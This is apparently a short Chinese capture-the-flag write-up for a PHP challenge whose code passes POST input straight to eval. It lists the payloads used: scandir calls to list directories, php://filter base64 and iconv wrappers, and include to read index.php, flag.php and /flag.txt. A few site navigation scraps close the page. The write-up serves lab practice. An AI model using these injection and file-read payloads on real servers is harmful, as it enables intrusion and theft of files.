信息收集
使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php
error_reporting和ini_set被禁用了,不必管他
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}
解题
照例查目录,读flag.php
c=var_export(scandir('.'));
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
flag不在这里,读根目录
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");
web69 目录 web71
:一文详解three.js中的纹理映射UV)
